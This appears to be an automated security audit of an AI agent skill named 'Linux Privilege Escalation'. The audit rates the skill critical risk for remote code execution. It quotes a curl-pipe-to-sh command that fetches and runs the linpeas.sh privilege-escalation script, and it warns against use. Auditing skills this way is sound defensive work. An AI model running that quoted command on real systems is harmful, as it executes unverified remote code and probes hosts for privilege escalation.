Linux Privilege Escalation
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- Remote Code Execution (CRITICAL): The skill utilizes a piped shell command to execute remote code. Specifically, it runs curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh, which allows an external script to run with the permissions of the agent process without any validation or integrity checks.
- Unverifiable Dependencies (CRITICAL): The download source https://github.com/carlospolop is not part of the established Trusted GitHub Organizations. Executing code from third-party, non-whitelisted repositories represents a severe supply chain risk.
- Privilege Escalation (HIGH): The targeted script, linpeas.sh, is a specialized tool designed to search for privilege escalation vulnerabilities on Linux systems. In the context of an AI skill, this behavior is highly suspicious and indicative of malicious intent or a security-testing tool being misused.
Recommendations
- HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata